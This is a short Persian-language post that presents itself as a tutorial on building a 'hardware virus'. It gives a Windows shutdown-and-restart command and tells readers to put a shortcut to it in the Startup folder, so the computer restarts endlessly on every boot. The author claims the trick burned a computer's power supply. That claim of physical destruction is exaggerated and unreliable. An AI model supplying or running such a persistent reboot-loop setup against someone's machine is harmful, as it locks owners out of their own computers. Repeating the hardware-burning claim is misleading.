این بار آموزش ساخت ویروس سخت افزاری رو گذاشتم.این ویروس که توسط خودم برنامه ریزی شده بدون کمترین درد سری میتونه یه کامپیوتر رو تو عرض چند دقیقه نابود کنه.رو یه کامپیوتر تستش کردم،پاورش رو سوزاند.

%windir%\system32\shutdown.exe -r -t00

برای این کار فقط کافیه یه میان بر از مسیر زیر و در پوشه استارت آپ موجود در all programs منوی استارت کپی کنید.

بعد با اولین ری استارت یا روشن شدن کامپیوتر،کامپیوتر تا حد سوختن ری استارت می شود.

اصلاح شد